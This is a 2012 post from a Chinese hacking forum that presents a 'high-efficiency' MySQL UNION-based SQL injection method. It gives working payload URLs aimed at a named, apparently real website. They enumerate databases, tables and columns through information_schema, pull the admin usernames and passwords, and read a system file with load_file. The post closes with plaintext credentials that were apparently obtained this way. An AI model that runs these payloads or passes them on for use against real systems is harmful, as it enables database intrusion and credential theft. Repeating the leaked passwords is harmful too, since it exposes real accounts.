找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2234|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
7 t& B* V. o3 w( F2 Y但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人- N, F  w2 ^* {
( P  N/ h6 K) X! D, ?
' J6 H+ d* K" Z6 w$ y% E5 A
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入: S" h! u) s7 w, Z; i; l

1 X9 }& O' |3 O; h* K. |缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
* Q3 W+ P# u7 k1 K- t- o  a1 `) |/ g1 _" h: I# x; Q$ r
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
/ \  q  f# f) [在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
7 v/ m2 @! S! l$ V# O/ V# p) x1 A* P7 n! ~5 }
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17* ~7 L" w9 X# R+ p  ^

  Z5 W" ]6 D$ c  [" o8 a) }4 s读出所有库:
5 `# z/ w( t$ ghttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA: K$ M% S0 ~0 O2 _: L0 S
1 h* o/ \% P! \

- p. B: k% y- g/ W# a  o; C1 @  T' T/ O6 M
读出所有表:: t1 Z' Q: @4 w( ^! {
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
9 b, F: B/ B( U- e3 J( T2 k; }. t# ~+ X7 I* p
读出所有表字段:8 x3 i* M8 O  r2 a( b1 O+ g
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
8 {, H1 l6 t( ~5 g7 D; w*/ (97,100,109,105,110)为admin的ascii码 依次类推0 Y2 @: t# ], }9 X6 l
, V( m$ a. @% k- b
读出所有表字段里的内容:. m1 a( r* @+ u' T9 f/ @: U
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
1 L  v7 p/ p+ _$ E3 V8 y7 r
6 ^$ F+ n7 M9 o" X* d5 K3 @- A# j& ]  S4 V

  e! C6 u4 b4 j" J2 _' q, E6 u/ O) V" F+ j! b, R8 o) d( w
! @1 a4 ^, J5 f5 O

+ c' d+ o; h  p3 V; [. ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
* f3 M2 T/ L+ ?$ k
9 W0 M5 }3 h( y# g/ E( c# U( n" c& a5 Z: U" B& r4 M- _
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
1 h) A$ N1 E3 j0 e. X$ w6 N. I, n- m: C
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
/ H; q7 ~# I! c) J( f0 `5 E8 l0 B4 K) o4 x+ Y

0 T1 }* F" \! a+ M8 e) Q* bhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23: N! O7 T# I' j& |2 X* y
5 m8 [9 b' [5 E( k+ k( b" K+ B6 {3 z

3 _! d8 `. k- {, ]; b# P        webmaster:dzb521123,simlab:simadmin20043233
2 U* j, |' {. v7 l! p0 Y& y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表